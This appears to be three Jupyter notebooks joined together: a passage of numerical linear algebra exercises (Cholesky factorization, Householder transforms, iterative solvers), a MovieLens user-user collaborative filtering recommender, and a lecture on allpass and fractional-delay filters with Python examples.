We see that after the first permutation the function works without problems. Exercise 18Let $L$ be the matrix with coefficients $l_{ij} = \max\{i-j+1, 0\}$ for all $i, j = 1, \cdots, n$. It is known that $L$ is the lower triangular matrix appearing in the Cholesky factorization of a matrix $A$ with $n$ rows and $n$ columns, of which we only know that its coefficient $a_{n2} = 14$. Determine the dimension of $A$ That is, $a_{n2} = 14$, and $a_{ij} = \sum_{k \le \min\{i,j\}}^n l_{ik}l_{jk}$Hence $a_{n2} = l_{n1}l_{21} + l_{n2}l_{22} = (n) \cdot (2) + (n - 1) \cdot (1) = 2n + n - 1 = 3n - 1$So $3n - 1 = 14$ and $n = 15/3 = 5$.Therefore, the matrix $L$ is:
###Code
L = zeros(5, 5)
for i in range(5):
for j in range(5):
ij = max(i - j + 1, 0)
L[i, j] = ij
L
###Output
_____no_output_____
###Markdown
And $A$ is
###Code
A = L * L.T
A
###Output
_____no_output_____
###Markdown
And we see that $a_{52} = a_{n2} = 14$ Exercise 19 Determine for which range of values of $\alpha$ the matrix $A$ is invertible and admits a Cholesky factorization.
###Code
a = Symbol('alpha')
A = Matrix([[2, 1, a], [1, 2, 1], [a, 1, 2]])
A
###Output
_____no_output_____
###Markdown
The matrix is invertible whenever its determinant is non-zero.
###Code
factor(det(A))
###Output
_____no_output_____
###Markdown
We see that the solutions are $\alpha = 2$ and $\alpha = -1$; for those values the matrix is not invertible. Moreover, a Cholesky factorization exists when $\det(A) > 0$, which holds for $-1 < \alpha < 2$. In those cases the factorization is
###Code
cholesky(A)
###Output
_____no_output_____
###Markdown
Exercise 20 Determine the Cholesky factorization of $A_{n\times n}$ with coefficients $$a_{11} = 1$$$$a_{ii} = 1 + i^2$$$$a_{i, i+1} = a_{i+1, i} = -i$$Compute the determinant of $A$ Let's generate a few illustrative examples to get an idea.
###Code
n = 7
A = zeros(n, n)
for i in range(n):
for j in range(n):
if i == j:
A[i,j] = (i+1) ** 2 + 1
elif i == (1 + j):
A[i,j] = -i
elif j == (1 + i):
A[i,j] = -j
else:
pass
A[0, 0] = 1
A
cholesky(A)
###Output
_____no_output_____
###Markdown
At first sight we can already see the obvious pattern. Let's prove it.We know that $l_{11} = 1$ and $l_{21} = -1$Let's check a couple of cases.For $i = 2$ we have$$l_{22} = \sqrt{a_{22} - l_{21}^2} = \sqrt{1 + 2^2 - (-1)^2} = 2$$$$l_{32} = \frac{a_{32} - \sum_k^1l_{3k}l_{2k}}{l_{22}} = \frac{-2 - (-1)(0)}{2} = -1$$And $l_{31} = 0$For $i=3$ we have$$l_{33} = \sqrt{a_{33} - \sum_{k=1}^{2}l_{3k}^2} = \sqrt{1 + 3^2 - l_{32}^2} = \sqrt{1 + 3^2 - (-1)^2} = 3$$$$l_{43} = \frac{-3 - l_{42}l_{32}}{l_{33}} = \frac{-3 - (-1)(0)}{3} = -1$$And, by induction:$$l_{ii} = \sqrt{a_{ii} - l_{i, i-1}^2} = \sqrt{1 + i^2 - 1} = i$$$$l_{i+1, i} = \frac{a_{i+1,i}}{l_{ii}} = \frac{-i}{i} = -1$$ Hence $L$ is lower bidiagonal with $l_{ii} = i$ and $l_{i+1,i} = -1$, and $\det{A} = \det({L})\det({L^T}) = \det({L})^2 = (n!)^2$ Exercise 21 Construct a Householder transformation that maps the vector $x = (\cos\alpha, -\sin\alpha, 1, 1)^t$ onto the vector $y = (1, 1, \sin\alpha, \cos\alpha)^t$. Find the matrix associated with this transformation for $\alpha = \pi/2$
###Code
vx = Matrix([cos(a), -sin(a), 1, 1])
vy = Matrix([1, 1, sin(a), cos(a)])
vx
H, e = householder(vx, vy, normalizar=True)
simplify(H)
simplify(e)
H.subs(a, pi/2)
###Output
_____no_output_____
###Markdown
Exercise 22 Let $A$ and $b$ be given. Apply the Gram-Schmidt method to orthonormalize the set of vectors $\{b, Ab, A^2b\}$.
###Code
A = Matrix([[1, 2, 0], [2, 1, 2], [0, 2, 1]])
b = Matrix([1, -1, 1])
T = zeros(3, 3)
T[:, 0] = b
T[:, 1] = A * b
T[:, 2] = A ** 2 * b
T
GS = gram_schmidt(T)
GS['P']
GS['Pn']
###Output
_____no_output_____
###Markdown
Exercise 23 Consider the linear system $Ax=b$. Find the value of $\beta$ that minimizes the spectral radius of $I - \beta A$
###Code
A = Matrix([[1, 1, 2], [0, 2, -1], [0, -1, 2]])
b = Matrix([1, 1, 1])
beta = Symbol('beta')
###Output
_____no_output_____
###Markdown
First, let's find the spectral radius of the matrix $I - \beta A$
###Code
iba = eye(3) - beta * A
iba
l = Symbol('lambda')
eq = factor(det(iba - eye(3) * l))
eq
###Output
_____no_output_____
###Markdown
We see that the eigenvalues of $I - \beta A$ are $\lambda = 1 - \beta$ and $\lambda = 1 - 3\beta$
###Code
x = np.linspace(-1, 1, 100)
plt.plot(x, [max(abs(1-i), abs(1-3*i)) for i in x])
###Output
_____no_output_____
###Markdown
We see that the smallest value is at $\beta = 0.5$, where $\rho(I - \beta A) = 0.5$ Exercise 24 Consider the linear system $$x_{i+1} = x_i + x_{i-1} \;\;\; i = 1, 2, 3$$$$x_0 = 1, x_4 = 5$$That is:$$\begin{align}x_2 & = x_1 + x_0\\x_3 & = x_2 + x_1\\x_4 & = x_3 + x_2\\\end{align}$$Substituting the known values:$$\begin{align}x_2 & = x_1 + 1\\x_3 & = x_2 + x_1\\5 & = x_3 + x_2\\\end{align}$$Analyze the convergence of the Jacobi method when applied to solving this system of equations.
###Code
A = Matrix([[-1, 1, 0], [1, 1, -1], [0, 1, 1]])
D = Matrix([[-1, 0, 0], [0, 1, 0], [0, 0, 1]])
b = Matrix([1, 0, -5])
help(metodo_iterativo)
metodo_iterativo(A=A, b=b, metodo='jacobi')
###Output
_____no_output_____
###Markdown
By the spectral radius criterion, the eigenvalues are $\pm\sqrt{2}i$ and the spectral radius is $\sqrt{2} > 1$, so the Jacobi method does not converge.Indeed, we see that the difference matrix grows with each iteration. Exercise 25 Analyze the convergence of the Jacobi, Gauss-Seidel and SOR methods when applied to the linear system$$\begin{pmatrix}4 & 1 & 0 & \cdots & 0 & 0 & 0 \\1 & 4 & 1 & \cdots & 0 & 0 & 0 \\0 & 1 & 4 & \cdots & 0 & 0 & 0 \\\vdots & \vdots & \vdots & \ddots & \vdots & \vdots & \vdots \\0 & 0 & 0 & \cdots & 4 & 1 & 0 \\0 & 0 & 0 & \cdots & 1 & 4 & 1 \\0 & 0 & 0 & \cdots & 0 & 1 & 4 \\\end{pmatrix}\begin{pmatrix}x_1\\x_2\\x_3\\\vdots\\x_{n-2}\\x_{n-1}\\x_n\end{pmatrix}=\begin{pmatrix}1\\2\\3\\\vdots\\n-2\\n-1\\n\end{pmatrix}$$
###Code
n = 8
A = eye(n) * 4
b = ones(n, 1)
for i in range(n-1):
A[i+1, i], A[i, i+1], b[i+1, 0] = 1, 1, i+2
A
b
dict_jac = metodo_iterativo(A=A, b=b, metodo='jacobi')
N(dict_jac['x']), N(Matrix(dict_jac['diff']))
dict_gs = metodo_iterativo(A=A, b=b, metodo='gs')
N(dict_gs['x']), N(Matrix(dict_gs['diff']))
dict_sor = metodo_iterativo(A=A, b=b, metodo='sor')
N(dict_sor['x']), N(Matrix(dict_sor['diff']))
###Output
_____no_output_____
###Markdown
We see that the iterations converge, and the immediate convergence criteria are justified. Let's study each of them in detail. **Spectral radius criterion**: we see that there are eigenvalues greater than 1, so we cannot guarantee the convergence of the system by this criterion.
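A complementary check (a sketch of ours) applies the criterion to the Jacobi iteration matrix $I - D^{-1}A$ itself rather than to $A$:
###Code
# Hedged sketch: spectral radius of the Jacobi iteration matrix H = I - D^{-1} A.
A_num = np.array(A, dtype=float)
H_jac = np.eye(n) - np.diag(1 / np.diag(A_num)) @ A_num
max(abs(np.linalg.eigvals(H_jac)))   # < 1, so the Jacobi iteration converges for this system
###Output
_____no_output_____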
###Code
solve(factor(det(A - eye(n) * l)), l)
###Output
_____no_output_____ |
GuideToPandas.ipynb | ###Markdown
Data Exploration with Pandas
###Code
%matplotlib inline
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
df = pd.read_csv('../data/titanic-train.csv')
df.head()
df.describe()
df.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 891 entries, 0 to 890
Data columns (total 12 columns):
PassengerId 891 non-null int64
Survived 891 non-null int64
Pclass 891 non-null int64
Name 891 non-null object
Sex 891 non-null object
Age 714 non-null float64
SibSp 891 non-null int64
Parch 891 non-null int64
Ticket 891 non-null object
Fare 891 non-null float64
Cabin 204 non-null object
Embarked 889 non-null object
dtypes: float64(2), int64(5), object(5)
memory usage: 83.6+ KB
###Markdown
Indexing
###Code
df.iloc[2]
df.iloc[0:5:2]
df[["Sex","Embarked"]].head()
###Output
_____no_output_____
###Markdown
Conditioning inside df with pandas
###Code
df["Age"].head() > 30
df[df['Age']>0].head()
df[(df['Age']> 30) & (df['Sex'] == 'male')].describe()
###Output
_____no_output_____
###Markdown
we can also use .querry for running conditional Unique values
###Code
df.head()
df["Pclass"].unique()
df["Name"].head()
###Output
_____no_output_____
###Markdown
Sorting of the values
###Code
df.sort_values('Age',axis = 0,ascending = False).head()
# Barkworth, Mr. Algernon Henry Wilson is oldest person on that ship that day
df[(df["Age"] >79)][["Age","Sex"]]
###Output
_____no_output_____
###Markdown
Exercise: how many null values are there in the Cabin column?
###Code
df["Cabin"].isnull().sum()  # .sum() counts the missing values (.count() would count every row)
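# For a column-by-column overview of missing values one could also run (sketch):
# df.isnull().sum()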
###Output
_____no_output_____ |
python/recommender/movie_recom_2.ipynb | ###Markdown
BUILDING A RECOMMENDER SYSTEM ON USER-USER COLLABORATIVE FILTERING (MOVIELENS DATASET) We will load the data sets first.
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math
#column headers for the dataset
data_cols = ['user id','movie id','rating','timestamp']
item_cols = ['movie id','movie title','release date','video release date','IMDb URL','unknown','Action',
'Adventure','Animation','Childrens','Comedy','Crime','Documentary','Drama','Fantasy','Film-Noir','Horror',
'Musical','Mystery','Romance ','Sci-Fi','Thriller','War' ,'Western']
user_cols = ['user id','age','gender','occupation','zip code']
#importing the data files onto dataframes
users = pd.read_csv('ml-100k/u.user', sep='|', names=user_cols, encoding='latin-1')
item = pd.read_csv('ml-100k/u.item', sep='|', names=item_cols, encoding='latin-1')
data = pd.read_csv('ml-100k/u.data', sep='\t', names=data_cols, encoding='latin-1')
###Output
_____no_output_____
###Markdown
We will use the file u.data first, as it contains User IDs, Movie IDs and Ratings. These three elements are all we need to determine the similarity of users based on their ratings for a particular movie. We first sort the DataFrame by User ID and then split the data set into a training set and a test set (the test set holds just one user, the one we will generate recommendations for).
###Code
utrain = (data.sort_values('user id'))[:99832]
print(utrain.tail())
utest = (data.sort_values('user id'))[99833:]
print(utest.head())
###Output
user id movie id rating timestamp
91841 943 132 3 888639093
91810 943 204 3 888639117
77956 943 94 4 888639929
87415 943 53 3 888640067
77609 943 124 3 875501995
###Markdown
We convert them to a NumPy Array for ease of iteration!
###Code
utrain = utrain[['user id', 'movie id', 'rating']].to_numpy()
utest = utest[['user id', 'movie id', 'rating']].to_numpy()
###Output
_____no_output_____
###Markdown
Create users_list, a list with one entry per user, each containing the list of that user's ratings. Unfortunately, this part adds considerably to the program's run time!
###Code
users_list = []
for i in range(1,943):
list = []
for j in range(0,len(utrain)):
if utrain[j][0] == i:
list.append(utrain[j])
else:
break
utrain = utrain[j:]
users_list.append(list)
###Output
_____no_output_____
###Markdown
Define a Function by the Name of EucledianScore. The purpose of the EucledianScore is to measure the similarity between two users based on their ratings given to movies that they have both in common. But what if the users have just one movie in common? In my opinion having more movies in common is a great sign of similarity. So if users have less than 4 movies in common then we assign them a high EucledianScore.
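To make the idea concrete, here is a tiny toy illustration (the user ratings and movie ids below are made up):

```python
# toy example: both users rated movies 10 and 20
u1 = {10: 4.0, 20: 3.0, 30: 5.0}     # movie id -> rating
u2 = {10: 5.0, 20: 3.0}
common = set(u1) & set(u2)
distance = sum((u1[m] - u2[m]) ** 2 for m in common) ** 0.5
print(common, distance)              # {10, 20} 1.0
```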
###Code
def EucledianScore(train_user, test_user):
sum = 0
count = 0
for i in test_user:
score = 0
for j in train_user:
if(int(i[1]) == int(j[1])):
score= ((float(i[2])-float(j[2]))*(float(i[2])-float(j[2])))
count= count + 1
sum = sum + score
if(count<4):
sum = 1000000
return(math.sqrt(sum))
###Output
_____no_output_____
###Markdown
Now we will iterate over users_list and find the similarity of the users to the test_user by means of this function and append the EucledianScore along with the User ID to a separate list score_list. We then convert it first to a DataFrame, sort it by the EucledianScore and finally convert it to a NumPy Array score_matrix for the ease of iteration.
###Code
score_list = []
for i in range(0,942):
score_list.append([i+1,EucledianScore(users_list[i], utest)])
score = pd.DataFrame(score_list, columns = ['user id','Eucledian Score'])
score = score.sort_values(by = 'Eucledian Score')
print(score)
score_matrix = score.to_numpy()
###Output
user id Eucledian Score
309 310 1.732051
138 139 3.872983
45 46 4.000000
208 209 4.242641
557 558 4.582576
724 725 4.690416
305 306 5.000000
241 242 5.000000
676 677 5.099020
265 266 5.196152
303 304 5.656854
753 754 5.744563
3 4 5.830952
798 799 6.000000
375 376 6.164414
796 797 6.244998
28 29 6.403124
799 800 6.557439
463 464 6.633250
515 516 6.708204
227 228 6.928203
438 439 7.000000
743 744 7.348469
580 581 7.416198
648 649 7.483315
203 204 7.483315
894 895 7.745967
875 876 7.810250
364 365 8.000000
52 53 8.000000
.. ... ...
650 651 1000.000000
651 652 1000.000000
655 656 1000.000000
148 149 1000.000000
661 662 1000.000000
146 147 1000.000000
145 146 1000.000000
672 673 1000.000000
142 143 1000.000000
674 675 1000.000000
280 281 1000.000000
281 282 1000.000000
139 140 1000.000000
680 681 1000.000000
133 134 1000.000000
283 284 1000.000000
684 685 1000.000000
686 687 1000.000000
687 688 1000.000000
132 133 1000.000000
128 129 1000.000000
125 126 1000.000000
383 384 1000.000000
712 713 1000.000000
111 112 1000.000000
110 111 1000.000000
719 720 1000.000000
106 107 1000.000000
104 105 1000.000000
694 695 1000.000000
[942 rows x 2 columns]
###Markdown
Now we see that the user with ID 310 has the lowest Eucledian score and hence the highest similarity. So now we need to obtain the list of movies that are not common between the two users. Make two lists. Get the full list of movies which are there on USER_ID 310. And then the list of common movies. Convert these lists into sets and get the list of movies to be recommended.
###Code
user= int(score_matrix[0][0])
common_list = []
full_list = []
for i in utest:
for j in users_list[user-1]:
if(int(i[1])== int(j[1])):
common_list.append(int(j[1]))
full_list.append(j[1])
common_list = set(common_list)
full_list = set(full_list)
recommendation = full_list.difference(common_list)
###Output
_____no_output_____
###Markdown
Now we need to create a compiled list of the movies along with their mean ratings. Merge the item and data files. Then group by movie title, select the columns we need, and find the mean rating of each movie. Finally, express the DataFrame as a NumPy array.
###Code
item_list = pd.merge(item, data).sort_values(by='movie id').groupby('movie title')[['movie id', 'rating']].mean()
item_list['movie title'] = item_list.index
item_list = item_list.to_numpy()   # columns: mean movie id, mean rating, movie title
###Output
_____no_output_____
###Markdown
Now we find the movies on item_list by IDs from recommendation. Then append them to a separate list.
###Code
recommendation_list = []
for i in recommendation:
recommendation_list.append(item_list[i-1])
recommendation = (pd.DataFrame(recommendation_list,columns = ['movie id','mean rating' ,'movie title'])).sort_values(by = 'mean rating', ascending = False)
print(recommendation[['mean rating','movie title']])
###Output
mean rating movie title
9 4.292929 Citizen Kane (1941)
8 4.125000 A Chef in Love (1996)
15 4.000000 Butcher Boy, The (1998)
6 3.930514 Indiana Jones and the Last Crusade (1989)
4 3.839050 Chasing Amy (1997)
3 3.792899 In the Line of Fire (1993)
10 3.648352 Casino (1995)
12 3.600000 Murder in the First (1995)
5 3.545455 Stalker (1979)
14 3.166667 Flower of My Secret, The (Flor de mi secreto, ...
11 3.105263 Bad Boys (1995)
16 2.802632 Brady Bunch Movie, The (1995)
0 2.750000 Ladybird Ladybird (1994)
13 2.720930 Pete's Dragon (1977)
2 2.413793 Canadian Bacon (1994)
7 2.285714 Last Time I Committed Suicide, The (1997)
1 2.000000 Calendar Girl (1993)
|
ADSP_09_AllPassFilters.ipynb | ###Markdown
Prof. Dr. -Ing. Gerald Schuller Jupyter Notebook: Renato Profeta Allpass Filters
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/sLY2mSAPh6M" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
So far we specified the magnitude of our frequency response and didn't care much about the phase. For allpass filters, it is basically the other way around. In the beginning of filter design, we saw that we can write a transfer function as:$$\large H(e^{j\Omega})=e^{j\phi(\Omega)}\cdot A(e^{j \Omega})$$Here we specify, or rather, alter the phase, and keep the magnitude of our frequency response at a constant 1, meaning$$A(e^{j\Omega})=1 $$Hence we would like to have a filter with transfer function H of magnitude constant 1,$$\mid H(e^{j\Omega})\mid=1$$This also means: the magnitude of our z-transform is **1 on the unit circle in the complex z-plane!**
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/sR4_P72QMAk" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
Allpass Filter as Fractional Delay
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/_u5IfMjc3aQ" frameborder="0" allow="accelerometer;encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
We can use such a filter to implement a **“fractional” delay** $d$, where d is a real number, for instance $d=0.5$ if we want to delay a signal by half a sample. In this case we cannot simply use a memory element as in the case of integer delays. In lecture 8 we saw that in this case, our ideal frequency response in the Discrete Time Fourier Transform (DTFT) domain is$$\large H(e^{j\Omega})=e^{-j\Omega \cdot d}$$To obtain its **ideal impulse response** for a filter design, we apply the inverse DTFT, also as seen in lecture 8,$$\large h(n)= \frac{1 } {2 \pi} \cdot \int_{\Omega=-\pi} ^ \pi H(e^{j\Omega}) e^{j \Omega n} d \Omega =$$$$\large h(n)= \frac{1} {2 \pi} \cdot \int _ {\Omega=-\pi} ^ \pi e^{-j \Omega d} e^{j \Omega n} d \Omega =$$$$\large = \frac{1} {2 \pi} \cdot \int _ {\Omega=-\pi} ^ \pi e^{j \Omega(-d+n)} d \Omega =$$$$\large = \frac{1} {2 \pi} \cdot \left( \frac{1} {j \cdot (-d+n)} e^{j \pi (-d+n)} - \frac{1} {j \cdot (-d+n)} e^{-j \pi (-d+n)} \right) =$$using $e^{j \cdot x}-e^{-j \cdot x}=2 \cdot j \cdot sin(x)$ we obtain:$$\large =\frac{1} { 2 \cdot \pi \cdot j \cdot (-d+n) } \cdot 2 \cdot j \cdot sin( \pi \cdot (-d+n) )=$$$$\large =\frac{1} { \pi \cdot (-d+n) } \cdot sin( \pi \cdot (-d+n) )=$$$$\large sinc( -d+n )$$ This means our ideal impulse response is simply a **sinc function**, shifted by d! For the case of an integer delay d this degenerates to a 1 at the d’th position of our impulse response, and zeros elsewhere. To make this an FIR filter, we need to apply a “**window function**”, as described in the lecture “Multirate Signal Processing”. **Example:** The window function is a sine window: $w(n)=sin(\frac{\pi} { L} \cdot ( n+0.5))$, with n=0..L-1, and L: length of the window. This avoids having sudden ends of the impulse response. We also want to keep the most significant parts of our sinc function, to keep the resulting error small; the samples we drop should be small. To include some of the significant values of the sinc function at negative n, we need to shift it to positive indices (by $n_0$) to make it causal. In this way, we obtain our impulse response,$$\large h(n)=sinc(-d+n-n_0) \cdot w(n)$$ **Python example:** Take $L=10, n_0=4$
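The following cells build exactly this impulse response inline; wrapped up as a reusable helper it could look like the sketch below (here the argument `d` is the total delay, i.e. it already includes the integer shift $n_0$):

```python
import numpy as np

def fractional_delay_fir(d, L):
    """Windowed-sinc FIR approximating a delay of d samples (sine window, L taps)."""
    n = np.arange(L)
    w = np.sin(np.pi / L * (n + 0.5))   # sine window
    return w * np.sinc(n - d)           # h(n) = sinc(n - d) * w(n)

h = fractional_delay_fir(4.5, 10)       # same coefficients as in the cell below
```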
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/BZv6wgx7PD4" frameborder="0" allow="accelerometer;
encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
%matplotlib inline
from sympy import init_printing
init_printing()
import numpy as np
import matplotlib.pyplot as plt
#time index range:
L=10
n=np.arange(L)
print('n:',n)
w=np.sin(np.pi/L*(n+0.5))
plt.figure()
plt.plot(w)
plt.plot(np.sinc(-0.5+n-4))
h=w*np.sinc(-0.5+n-4)
plt.plot(h)
plt.legend(('Sine Window', 'Sinc Function', 'Windowed SincFunction'),bbox_to_anchor=(1.04,1), loc="upper left")
plt.title('The Shifted Windowed Sinc Function')
plt.grid()
plt.figure()
x=np.hstack((np.arange(4),np.zeros(8)))
plt.plot(x)
import scipy.signal as sp
y=sp.lfilter(h,1,x)
plt.plot(y)
plt.legend(('Original Signal','Shifted signal, by 4.5 samples'),bbox_to_anchor=(1.04,1), loc="upper left")
plt.title('The Test Signal, Shifted by our Filter by 4.5 Samples')
plt.grid()
#Test with longer filter, to reduce errors:
plt.figure()
L=20
n=np.arange(L)
w=np.sin(np.pi/L*(n+0.5))
plt.plot(np.sinc(-0.5+n-9))
h=w*np.sinc(-0.5+n-9)
plt.plot(h)
plt.legend(('The Shifted Sinc Function','The Shifted Windowed SincFunction'),bbox_to_anchor=(1.04,1), loc="upper left")
plt.title('The Shifted Sinc Function')
plt.grid()
plt.figure()
x=np.hstack((np.arange(4),np.zeros(12)))
y=sp.lfilter(h,1,x)
plt.plot(x)
plt.plot(y)
plt.legend(('Shifted signal, by 9.5 samples', 'Original Signal'),bbox_to_anchor=(1.04,1), loc="upper left")
plt.title('The Test Signal, Shifted by our Filter by 9.5 Samples')
plt.grid()
###Output
n: [0 1 2 3 4 5 6 7 8 9]
###Markdown
**Observe:** The longer we make the filter, keeping the mainlobe of the sinc function in the center, the smaller the resulting error for the shifted signal x becomes, but the height of the ripples remains similar.
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/krAMLN7tF0M" frameborder="0" allow="accelerometer;
encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
from scipy.signal import freqz
import numpy as np
from matplotlib.ticker import FuncFormatter, MultipleLocator
w, h_response = freqz(h)
fig=plt.figure(figsize=(10,8))
fig.suptitle('Frequency Response', fontsize=16)
plt.subplot(2,1,1)
plt.plot(w, 20 * np.log10(abs(h_response)), 'b')
plt.ylabel('Amplitude (dB)')
plt.xlabel('Normalized Frequency')
plt.grid()
'''ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))'''
plt.subplot(2,1,2)
angles = np.angle(h_response)
plt.plot(w, angles, 'g')
'''plt.ylabel('Angle (radians)')
plt.xlabel('Normalized Frequency')
ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))'''
plt.grid()
###Output
_____no_output_____
###Markdown
**Observe** the phase plot at normalized frequency. Remember: Angle = -d Omega for a delay d, hence d = -Angle/Omega, the negative slope. Also observe that the magnitude deviates from 0 dB at high frequencies, above roughly normalized frequency 2.8. To estimate the obtained delay (for verification), we use the mouse, go to y=-3.14, which is the first wrap-around point, and read out position x=0.32. From that we obtain the delay d = -y/x = 3.14/0.32 = 9.8, which is indeed roughly the desired 9.5 samples delay. Observe that our calculation from the plot is only a rough estimation. This gives us a **tool for fractional delays!** But we have this attenuation at high frequencies. IIR filters can improve our filter's performance.
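Instead of reading the slope off the plot, the group delay $d=-\Delta\phi/\Delta\Omega$ can also be estimated numerically; a small sketch (it assumes `h` from the cell above is still defined):

```python
import numpy as np
import scipy.signal as sp

w, H = sp.freqz(h)
phase = np.unwrap(np.angle(H))
group_delay = -np.diff(phase) / np.diff(w)
print(group_delay[:10])      # roughly 9.5 samples in the passband
```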
###Code
# Delay:
peaks, _ = sp.find_peaks(-angles, height=0)
-angles[peaks[0]]/w[peaks[0]]
###Output
_____no_output_____
###Markdown
IIR Fractional Delay Filter Design In “I. Selesnick, “Low-pass filters realizable as allpass sums: design via a new flat delay filter,” in IEEE Transactions on Circuits and Systems II: Analog and Digital Signal Processing, vol. 46, 1999” we found a way to design fractional delay IIR allpass filters. https://ieeexplore.ieee.org/document/749080
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/-_-k_o3CLpc" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
%%html
<iframe src='https://ieeexplore.ieee.org/document/749080/references#references', width=800, height=400></iframe>
###Output
_____no_output_____
###Markdown
As a Python function it is,
###Code
def allp_delayfilt(tau):
'''
produces a Fractional-delay All-pass Filter
Arguments: tau: fractional delay in samples (float).
:returns:
a: Denominator of the transfer function
b: Numerator of the transfer function
'''
L = int(tau)+1
n = np.arange(0,L)
a_0 = np.array([1.0])
a = np.array(np.cumprod( np.divide(np.multiply((L -
n), (L-n-tau)) , (np.multiply((n+1), (n+1+tau))))))
a = np.append(a_0, a) # Denominator of the transfer function
b = np.flipud(a) # Numerator of the transfer function
return a, b
#testing the fractional delay allpass filter
import matplotlib.pyplot as plt
import scipy.signal as sp
#fractional delay of 5.5 samples:
a,b=allp_delayfilt(5.5)
x=np.hstack((np.arange(4),np.zeros(8)))
y=sp.lfilter(b,a,x) #applying the allpass filter
plt.figure(figsize=(10,8))
plt.title('The IIR Fractional Delay Filter Result')
plt.xlabel('Samples')
plt.plot(x, label='Original Signal')
plt.plot(y, label='Delayed Signal')
plt.grid()
plt.legend(bbox_to_anchor=(1.04,1), loc="upper left");
###Output
_____no_output_____
###Markdown
**Observe** that the extrapolated zero crossing of the orange delayed signal would indeed be at around 5.5 samples. Also observe that particularly before our signal we now have **fewer ripples**.
###Code
# Frequency Response
from scipy.signal import freqz
import numpy as np
from matplotlib.ticker import FuncFormatter, MultipleLocator
w, h_response = freqz(b,a)
fig=plt.figure(figsize=(10,8))
fig.suptitle('Frequency Response', fontsize=16)
plt.subplot(2,1,1)
plt.plot(w/np.pi, 20 * np.log10(abs(h_response)), 'b')
#plt.ylim((-0.001,0.001))
plt.ylabel('Amplitude (dB)')
plt.xlabel('Normalized Frequency')
plt.grid()
ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))
plt.subplot(2,1,2)
angles = np.angle(h_response)
plt.plot(w/np.pi, angles, 'g')
plt.ylabel('Angle (radians)')
plt.xlabel('Normalized Frequency')
ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))
plt.grid()
###Output
_____no_output_____
###Markdown
Now we obtain a nice impulse response, or set of coefficients, and its frequency response is shown above: **Observe** that the magnitude is practically precisely at 0 dB, except for rounding errors, meaning a gain factor of 1. **Observe** the phase plot at normalized frequency; put the mouse over Omega=0.5. The angle is -2.8 radians. Remember: Angle = -d Omega for a delay d, hence d = -Angle/Omega = 2.8/0.5 = 5.6. This fits nicely with our desired delay of 5.5 samples!
###Code
# Delays
peaks, _ = sp.find_peaks(-angles, height=0)
-angles[peaks[0]]/w[peaks[0]]
###Output
_____no_output_____
###Markdown
Application example: Stereo source separation, with 2 sources and 2 microphones. We want to cancel one of the 2 sources, and for that we need to model the precise delay from one microphone to the other, to be able to remove the signal by subtraction. See e.g.: - Oleg Golokolenko and Gerald Schuller: "FAST TIME DOMAIN STEREO AUDIO SOURCE SEPARATION USING FRACTIONAL DELAY FILTERS", 147th AES Convention, October 16–19, 2019, New York, NY, USA - Oleg Golokolenko, Gerald Schuller: "A FAST STEREO AUDIO SOURCE SEPARATION FOR MOVING SOURCES", Asilomar Conference on Signals, Systems, and Computers, Nov 3-6, 2019, Asilomar, CA, USA Simple IIR Allpass Filters The simplest allpass filter has one pole and one zero in the z-domain for the transfer function, $$\large H_{ap}(z)=\frac{z^{-1} -\bar{ a} } {1 -a z^{-1}}=\frac{-\bar{ a} (1- \frac{z^{-1} } {\bar {a}}) } {1 -a z^{-1}}$$ where $a$ is a complex number, and $\bar{a}$ denotes its complex conjugate. Observe that here we have a zero at $z=\frac{1}{\bar{a}}$ and a pole at $z=a$! **The pole and the zero are at conjugate reciprocal locations!**
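That the magnitude is indeed 1 on the whole unit circle can also be checked numerically; a small sketch (the coefficient value is just an example):

```python
import numpy as np
from scipy.signal import freqz

a = 0.5 * (1 + 1j)               # example complex allpass coefficient
B = [-np.conj(a), 1.0]           # numerator:  z^{-1} - conj(a)  (coefficients of z^0, z^-1)
A = [1.0, -a]                    # denominator: 1 - a z^{-1}
w, H = freqz(B, A, worN=512)
print(np.allclose(np.abs(H), 1.0))   # True: magnitude 1 at all frequencies
```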
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/_SzJLFPuBig" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
**Example:** If a=0.5, we obtain the pole/zero plot with Python,
###Code
def zplane(B,A):
# Plot Poles and Zeros
from matplotlib import patches
plt.figure(figsize=(10,8))
ax = plt.subplot(111)
r = 2.5; plt.axis('scaled'); plt.axis([-r, r, -r, r])
#ticks = [-1, 1]; plt.xticks(ticks); plt.yticks(ticks)
# Unit Circle
uc = patches.Circle((0,0), radius=1, fill=False, color='black', ls='dashed')
ax.add_patch(uc)
ax.spines['left'].set_position('center')
ax.spines['bottom'].set_position('center')
